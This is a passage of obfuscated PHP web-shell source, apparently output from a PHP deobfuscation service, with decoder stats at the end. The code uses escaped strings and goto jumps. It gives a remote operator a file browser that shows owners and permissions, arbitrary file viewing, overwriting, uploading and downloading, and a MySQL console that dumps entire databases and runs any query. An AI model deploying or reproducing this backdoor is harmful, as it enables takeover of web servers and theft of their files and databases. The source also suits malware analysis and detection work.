$e_work_dir . readlink($work_dir . $fn) : $e_work_dir . str_replace("\42", "\x26\x71\x75\157\164\x3b", $fn)) . "\42\x3b\144\x6f\143\x75\x6d\145\x6e\x74\x2e\x6c\151\163\x74\x2e\x73\165\142\155\x69\164\x28\51\x3b\x27\76" . htmlspecialchars(strlen($fn) > format ? substr($fn, 0, format - 3) . "\56\56\56" : $fn) . "\x3c\x2f\x61\x3e" . str_repeat("\x20", format - strlen($fn)); if ($winda === false) { $owner = @posix_getpwuid(@fileowner($work_dir . $fn)); $group = @posix_getgrgid(@filegroup($work_dir . $fn)); printf("\45\x20\62\60\x73\174\x25\x20\55\62\x30\x73", $owner["\x6e\x61\x6d\145"], $group["\x6e\x61\155\145"]); } echo @get_perms($work_dir . $fn) . str_repeat("\40", 10); printf("\x25\40\x32\x30\163\x20", @filesize($work_dir . $fn) . "\x42"); printf("\45\x20\55\62\60\x73", @date("\115\40\144\x20\131\x20\x48\72\151\x3a\163", @filemtime($work_dir . $fn)) . "\xa"); } echo "\x3c\x2f\160\162\x65\x3e\x3c\x68\x72\x3e"; ?>
<form name='list' method=post>
<input name='work_dir' type=hidden size=120><br>
<input name='page' value='cmd' type=hidden>
<input name='f_action' value='view' type=hidden>
</form>
<?php } else { echo "\x45\162\162\x6f\162\x20\114\151\x73\x74\x69\x6e\x67\x20" . $e_work_dir; } } else { switch ($f_action) { case "\166\x69\145\x77": echo "\74\163\164\162\x6f\x6e\x67\76" . $e_work_dir . "\x20\x45\144\x69\x74\74\57\163\164\162\157\156\x67\x3e\74\150\x72\76\x3c\160\162\145\76\12"; $f = @fopen($work_dir, "\x72"); ?>
<form method=post>
<textarea name='file_text' cols=120 rows=20><?php if (!$f) { echo $e_work_dir . "\40\156\x6f\164\40\x65\x78\151\x73\x74\x73"; } else { while (!feof($f)) { echo htmlspecialchars(fread($f, 100000)); } } ?>
</textarea>
<input name='page' value='cmd' type=hidden>
<input name='work_dir' type=hidden value='<?php echo $e_work_dir; ?>
' size=120>
<input name='f_action' value='save' type=submit>
</form>
<?php break; case "\x73\141\166\x65": $file_text = isset($_POST["\146\x69\154\x65\137\x74\145\170\x74"]) ? magic_q($_POST["\146\x69\x6c\145\x5f\164\x65\170\x74"]) : ''; $f = @fopen($work_dir, "\x77"); if (!$f) { echo "\x3c\x73\164\x72\157\x6e\x67\76\105\162\162\157\162\x20" . $e_work_dir . "\x3c\57\x73\164\162\157\156\147\x3e\x3c\x68\x72\x3e\x3c\x70\162\x65\x3e\xa"; } else { fwrite($f, $file_text); fclose($f); echo "\74\163\x74\162\x6f\156\x67\76" . $e_work_dir . "\40\x69\163\40\163\x61\166\151\x6e\147\74\x2f\x73\x74\162\x6f\x6e\x67\76\74\x68\162\x3e\x3c\x70\162\145\x3e\xa"; } break; } } break; } break; case "\x75\x70\x6c\x6f\x61\144": if ($work_dir == '') { $work_dir = "\x2f"; } else { if (!($work_dir[strlen($work_dir) - 1] == "\57" || $work_dir[strlen($work_dir) - 1] == "\134")) { $work_dir .= "\57"; } } $f = $_FILES["\146\x69\154\145\x6e\141\x6d\x65"]["\156\x61\x6d\x65"]; if (!@copy($_FILES["\x66\151\154\x65\156\141\x6d\x65"]["\x74\155\x70\137\x6e\x61\x6d\145"], $work_dir . $f)) { echo "\125\160\154\157\141\x64\40\151\163\x20\146\x61\151\154\145\x64"; } else { echo "\146\x69\154\145\40\x69\x73\x20\x75\160\154\x6f\141\144\145\x64\40\x69\x6e\40" . $e_work_dir; } break; case "\144\x6f\x77\x6e\x6c\x6f\x61\144": $fname = isset($_POST["\146\156\141\155\145"]) ? $_POST["\146\x6e\141\155\x65"] : ''; $temp_file = isset($_POST["\164\x65\155\160\137\146\151\x6c\x65"]) ? "\157\x6e" : "\x6e\x6e"; $f = @fopen($fname, "\x72"); if (!$f) { echo "\x66\x69\x6c\145\x20\x69\x73\x20\156\x6f\164\40\145\x78\151\163\x74\163"; } else { $archive = isset($_POST["\x61\x72\143\x68\151\166\x65"]) ? $_POST["\x61\162\x63\150\151\166\x65"] : ''; if ($archive == "\x67\x7a\x69\160") { Header("\x43\157\x6e\164\x65\156\164\x2d\124\x79\x70\x65\x3a\x61\160\160\x6c\151\143\x61\x74\151\157\x6e\57\170\x2d\147\x7a\151\x70\12"); $s = gzencode(fread($f, filesize($fname))); Header("\x43\157\156\x74\145\156\164\x2d\114\x65\x6e\x67\164\x68\x3a\x20" . strlen($s) . "\12"); Header("\103\157\156\x74\x65\x6e\x74\x2d\x44\x69\x73\x70\x6f\163\x69\x74\x69\x6f\156\72\x20\x61\164\x74\141\143\x68\x6d\x65\x6e\164\x3b\40\x66\151\154\145\x6e\141\155\x65\x3d\42" . str_replace("\x2f", "\55", $fname) . "\56\147\172\12\12"); echo $s; } else { Header("\103\x6f\156\x74\x65\x6e\164\55\124\171\x70\x65\72\141\160\160\154\x69\143\141\x74\151\x6f\156\57\157\x63\164\x65\x74\x2d\x73\x74\162\145\x61\155\12"); Header("\103\157\156\164\145\x6e\x74\x2d\114\x65\x6e\147\164\x68\x3a\x20" . filesize($fname) . "\xa"); Header("\x43\x6f\x6e\164\145\x6e\x74\55\x44\151\x73\x70\x6f\x73\x69\x74\151\x6f\156\72\x20\141\164\x74\141\143\150\x6d\145\x6e\164\x3b\x20\x66\x69\154\145\156\x61\x6d\145\x3d\x22" . str_replace("\57", "\55", $fname) . "\xa\12"); ob_start(); while (feof($f) === false) { echo fread($f, 10000); ob_flush(); } } } } break; case "\x6d\x79\x73\161\x6c": $action = isset($_POST["\141\143\x74\151\x6f\x6e"]) ? $_POST["\141\x63\164\151\157\156"] : "\x71\165\x65\x72\171"; $user = isset($_POST["\165\x73\x65\x72"]) ? $_POST["\165\x73\145\x72"] : ''; $passwd = isset($_POST["\x70\x61\163\x73\167\144"]) ? $_POST["\160\x61\x73\x73\x77\144"] : ''; $db = isset($_POST["\144\x62"]) ? $_POST["\144\142"] : ''; $host = isset($_POST["\x68\157\x73\x74"]) ? $_POST["\150\157\163\x74"] : "\154\x6f\x63\x61\154\150\x6f\163\x74"; $query = isset($_POST["\x71\165\145\162\x79"]) ? magic_q($_POST["\161\165\x65\162\171"]) : ''; switch ($action) { case "\x64\x75\155\x70": $mysql_link = @mysql_connect($host, $user, $passwd); if (!$mysql_link) { echo "\103\x6f\x6e\x6e\x65\x63\x74\40\145\162\162\157\162"; } else { $to_file = isset($_POST["\x74\157\x5f\146\x69\154\145"]) ? $_POST["\164\x6f\137\x66\151\x6c\x65"] == '' ? false : $_POST["\x74\157\137\x66\151\x6c\x65"] : false; $archive = isset($_POST["\x61\162\x63\150\x69\166\145"]) ? $_POST["\x61\162\x63\150\151\166\145"] : "\156\157\x6e\145"; if ($archive !== "\x6e\x6f\x6e\x65") { $to_file = false; } $db_dump = isset($_POST["\144\x62\137\x64\165\x6d\x70"]) ? $_POST["\x64\x62\x5f\144\x75\x6d\x70"] : ''; $table_dump = isset($_POST["\x74\141\x62\x6c\145\137\144\x75\155\x70"]) ? $_POST["\164\x61\x62\x6c\145\x5f\144\165\155\160"] : ''; if (!@mysql_select_db($db_dump, $mysql_link)) { echo "\104\x42\x20\x65\162\x72\157\162"; } else { $dump_file = "\x23\x5a\x61\x43\157\40\x4d\x79\123\x51\114\40\x44\x75\155\160\x65\x72\xa\x23\x64\142\40{$db}\x20\146\x72\157\x6d\x20{$host}\xa"; ob_start(); if ($to_file) { $t_f = @fopen($to_file, "\x77"); if (!$t_f) { die("\103\141\x6e\x74\40\157\160\145\156\x69\156\x67\40" . $to_file); } } else { $t_f = false; } if ($table_dump == '') { if (!$to_file) { header("\103\x6f\156\x74\x65\x6e\164\x2d\x54\171\x70\145\72\x20\141\160\x70\x6c\151\x63\x61\164\151\157\156\x2f\x78\55" . ($archive == "\x6e\157\156\145" ? "\157\143\164\x65\x74\55\163\164\162\145\141\155" : "\x67\x7a\151\x70") . "\12"); header("\103\157\156\164\x65\x6e\x74\55\104\x69\163\x70\157\x73\151\x74\151\x6f\156\x3a\40\141\164\164\141\143\x68\x6d\145\156\x74\73\40\146\x69\154\x65\x6e\x61\155\x65\x3d\x22\x64\x75\x6d\x70\x5f{$db_dump}\56\x73\x71\154" . ($archive == "\156\157\x6e\145" ? '' : "\56\147\x7a") . "\42\xa\12"); } $result = mysql_query("\x73\150\x6f\167\x20\x74\141\142\x6c\x65\163", $mysql_link); for ($i = 0; $i < mysql_num_rows($result); $i++) { $rows = mysql_fetch_array($result); $result2 = @mysql_query("\163\x68\x6f\x77\x20\x63\157\154\165\x6d\x6e\x73\40\x66\162\157\x6d\x20\140" . $rows[0] . "\x60", $mysql_link); if (!$result2) { $dump_file .= "\43\x65\x72\x72\157\x72\40\x74\141\142\x6c\x65\x20" . $rows[0]; } else { $dump_file .= "\x63\162\x65\x61\164\145\x20\x74\x61\x62\154\x65\40\x60" . $rows[0] . "\x60\50\xa"; for ($j = 0; $j < mysql_num_rows($result2) - 1; $j++) { $rows2 = mysql_fetch_array($result2); $dump_file .= "\x60" . $rows2[0] . "\x60\x20" . $rows2[1] . ($rows2[2] == "\x4e\x4f" && $rows2[4] != "\116\125\114\114" ? "\x20\116\117\x54\40\x4e\125\x4c\114\x20\x44\x45\x46\101\x55\114\x54\40\x27" . $rows2[4] . "\x27" : "\40\104\x45\106\x41\125\114\x54\40\116\125\114\114") . "\x2c\xa"; } $rows2 = mysql_fetch_array($result2); $dump_file .= "\x60" . $rows2[0] . "\x60\x20" . $rows2[1] . ($rows2[2] == "\x4e\117" && $rows2[4] != "\116\125\114\x4c" ? "\x20\x4e\x4f\124\40\116\x55\114\x4c\40\104\x45\x46\101\x55\x4c\124\40\47" . $rows2[4] . "\x27" : "\x20\x44\x45\106\101\125\114\124\40\x4e\x55\x4c\x4c") . "\xa"; $type[$j] = $rows2[1]; $dump_file .= "\51\x3b\12"; mysql_free_result($result2); $result2 = mysql_query("\163\145\154\x65\143\164\x20\52\40\x66\162\x6f\x6d\x20\140" . $rows[0] . "\140", $mysql_link); $columns = $j - 1; for ($j = 0; $j < mysql_num_rows($result2); $j++) { $rows2 = mysql_fetch_array($result2); $dump_file .= "\x69\156\x73\x65\x72\x74\40\151\156\164\x6f\40\x60" . $rows[0] . "\140\x20\166\141\x6c\165\x65\x73\40\50"; for ($k = 0; $k < $columns; $k++) { $dump_file .= $rows2[$k] == '' ? "\x6e\x75\x6c\x6c\x2c" : "\47" . addslashes($rows2[$k]) . "\x27\x2c"; } $dump_file .= ($rows2[$k] == '' ? "\x6e\165\154\x6c\x29\x3b" : "\47" . addslashes($rows2[$k]) . "\47\51\73") . "\12"; if ($archive == "\156\157\156\145") { if ($to_file) { fwrite($t_f, $dump_file); fflush($t_f); } else { echo $dump_file; ob_flush(); } $dump_file = ''; } } mysql_free_result($result2); } } mysql_free_result($result); if ($archive != "\156\157\156\x65") { $dump_file = gzencode($dump_file); header("\x43\157\x6e\164\x65\x6e\164\x2d\x4c\145\x6e\x67\x74\150\72\x20" . strlen($dump_file) . "\xa"); echo $dump_file; } else { if ($t_f) { fclose($t_f); echo "\x44\165\155\x70\40\x66\x6f\x72\40" . $db_dump . "\x20\156\x6f\167\x20\x69\x6e\x20" . $to_file; } } } else { $result2 = @mysql_query("\x73\x68\x6f\x77\40\143\x6f\x6c\165\x6d\x6e\163\x20\146\x72\x6f\155\40\140" . $table_dump . "\x60", $mysql_link); if (!$result2) { echo "\x65\x72\162\157\x72\x20\x74\x61\x62\x6c\x65\40" . $table_dump; } else { if (!$to_file) { header("\x43\x6f\156\164\145\156\x74\x2d\124\171\160\x65\x3a\40\141\x70\160\x6c\x69\143\141\x74\151\157\x6e\57\170\55" . ($archive == "\156\x6f\x6e\145" ? "\x6f\143\x74\145\164\55\163\x74\x72\x65\141\x6d" : "\147\172\x69\160") . "\xa"); header("\103\x6f\x6e\x74\x65\156\x74\55\104\151\x73\160\x6f\x73\151\x74\151\x6f\x6e\x3a\x20\x61\164\164\141\x63\150\x6d\x65\x6e\164\73\x20\146\151\x6c\145\x6e\x61\155\145\x3d\42\144\x75\155\160\x5f{$db_dump}\56\163\x71\x6c" . ($archive == "\x6e\x6f\156\x65" ? '' : "\56\147\172") . "\x22\xa\12"); } if ($to_file === false) { header("\103\x6f\x6e\164\x65\x6e\164\x2d\124\x79\160\145\x3a\x20\141\160\x70\154\x69\143\141\164\x69\x6f\156\57\170\55" . ($archive == "\156\157\x6e\x65" ? "\x6f\x63\164\x65\164\x2d\x73\164\162\x65\141\x6d" : "\x67\x7a\151\160") . "\12"); header("\x43\157\156\164\145\156\164\55\x44\x69\163\x70\157\x73\x69\164\x69\157\156\x3a\40\x61\164\164\x61\x63\x68\x6d\x65\x6e\164\73\40\146\x69\154\x65\x6e\x61\x6d\145\75\x22\144\x75\x6d\160\x5f{$db_dump}\x5f{$table_dump}\56\x73\x71\x6c" . ($archive == "\156\157\156\145" ? '' : "\x2e\147\x7a") . "\x22\xa\xa"); } $dump_file .= "\x63\x72\x65\141\164\145\40\x74\141\x62\154\x65\40\140{$table_dump}\140\50\xa"; for ($j = 0; $j < mysql_num_rows($result2) - 1; $j++) { $rows2 = mysql_fetch_array($result2); $dump_file .= "\140" . $rows2[0] . "\x60\40" . $rows2[1] . ($rows2[2] == "\116\117" && $rows2[4] != "\x4e\125\x4c\114" ? "\x20\116\117\x54\40\x4e\x55\114\x4c\x20\x44\105\106\101\125\x4c\x54\40\47" . $rows2[4] . "\47" : "\40\104\x45\x46\101\125\114\124\x20\116\125\114\x4c") . "\54\xa"; } $rows2 = mysql_fetch_array($result2); $dump_file .= "\x60" . $rows2[0] . "\x60\40" . $rows2[1] . ($rows2[2] == "\x4e\x4f" && $rows2[4] != "\x4e\125\x4c\114" ? "\40\x4e\117\x54\40\x4e\x55\x4c\x4c\40\104\105\x46\101\125\114\124\40\47" . $rows2[4] . "\x27" : "\x20\x44\105\106\x41\x55\x4c\x54\40\116\x55\114\114") . "\12"; $type[$j] = $rows2[1]; $dump_file .= "\51\73\12"; mysql_free_result($result2); $result2 = mysql_query("\163\x65\154\145\x63\x74\x20\52\x20\x66\x72\157\x6d\40\140" . $table_dump . "\140", $mysql_link); $columns = $j - 1; for ($j = 0; $j < mysql_num_rows($result2); $j++) { $rows2 = mysql_fetch_array($result2); $dump_file .= "\151\156\163\x65\162\x74\40\x69\156\x74\157\40\140" . $table_dump . "\x60\x20\166\141\x6c\x75\x65\x73\x20\x28"; for ($k = 0; $k < $columns; $k++) { $dump_file .= $rows2[$k] == '' ? "\x6e\x75\154\x6c\x2c" : "\x27" . addslashes($rows2[$k]) . "\47\x2c"; } $dump_file .= ($rows2[$k] == '' ? "\156\165\154\x6c\x29\73" : "\x27" . addslashes($rows2[$k]) . "\47\x29\73") . "\xa"; if ($archive == "\x6e\x6f\x6e\145") { if ($to_file) { fwrite($t_f, $dump_file); fflush($t_f); } else { echo $dump_file; ob_flush(); } $dump_file = ''; } } mysql_free_result($result2); if ($archive != "\x6e\x6f\156\145") { $dump_file = gzencode($dump_file); header("\103\157\x6e\164\145\x6e\164\55\114\145\156\x67\x74\150\72\x20" . strlen($dump_file) . "\12"); echo $dump_file; } else { if ($t_f) { fclose($t_f); echo "\104\165\155\160\x20\146\157\162\40" . $db_dump . "\x20\x6e\157\x77\x20\151\x6e\40" . $to_file; } } } } } } break; case "\161\x75\145\162\x79": echo $head . $pages; ?>
<hr>
<form method=post>
<table>
<td>
<table align=left>
<tr><td>User :<input name='user' type=text value='<?php echo $user; ?>
'></td><td>Passwd :<input name='passwd' type=text value='<?php echo $passwd; ?>
'></td><td>Host :<input name='host' type=text value='<?php echo $host; ?>
'></td><td>DB :<input name='db' type=text value='<?php echo $db; ?>
'></td></tr>
<tr><textarea name='query' cols=120 rows=20><?php echo htmlspecialchars($query); ?>
</textarea></tr>
</table>
</td>
<td>
<table>
<tr><td>DB :</td><td><input type=text name='db_dump' value='<?php echo $db; ?>
'></td></tr>
<tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr>
<input name='archive' type=radio value='none'>without arch
<input name='archive' type=radio value='gzip' checked=true>gzip archive
<tr><td><input type=submit name='action' value='dump'></td></tr>
<tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr>
</table>
</td>
</table>
<input name='page' value='mysql' type=hidden>
<input name='action' value='query' type=submit>
</form>
<hr>
<?php $mysql_link = @mysql_connect($host, $user, $passwd); if (!$mysql_link) { echo "\103\x6f\x6e\x6e\x65\143\x74\40\x65\x72\x72\157\162"; } else { if ($db != '') { if (!@mysql_select_db($db, $mysql_link)) { echo "\104\x42\40\145\162\x72\157\162"; mysql_close($mysql_link); break; } } $result = @mysql_query($query, $mysql_link); if (!$result) { echo mysql_error(); } else { echo "\x3c\x74\x61\x62\154\x65\x20\x76\141\154\x69\x67\x6e\75\164\x6f\x70\x20\x61\x6c\151\147\x6e\75\154\x65\x66\x74\x3e\12\x3c\x74\162\76"; for ($i = 0; $i < mysql_num_fields($result); $i++) { echo "\74\164\144\x3e\74\142\x3e" . htmlspecialchars(mysql_field_name($result, $i)) . "\x3c\57\142\76\40\x20\74\57\x74\144\x3e"; } echo "\xa\x3c\x2f\x74\162\76\xa"; for ($i = 0; $i < mysql_num_rows($result); $i++) { $rows = mysql_fetch_array($result); echo "\x3c\164\162\x20\x76\x61\x6c\151\x67\156\x3d\x74\157\160\40\x61\x6c\151\147\x6e\x3d\x6c\145\146\x74\x3e"; for ($j = 0; $j < mysql_num_fields($result); $j++) { echo "\x3c\x74\144\76" . htmlspecialchars($rows[$j]) . "\74\x2f\164\x64\x3e"; } echo "\x3c\57\x74\x72\76\xa"; } echo "\74\57\x74\141\142\154\x65\76\12"; } mysql_close($mysql_link); } break; } break; } goto lcG8g; cgtMn: $c87 = $_SERVER["\122\x45\115\117\x54\x45\x5f\101\104\104\122"]; goto GRhxK; lcG8g: ?>Function Calls
| None |
Stats
| MD5 | 220bf8d31cc07250afe4c43c5dfbc889 |
| Eval Count | 0 |
| Decode Time | 98 ms |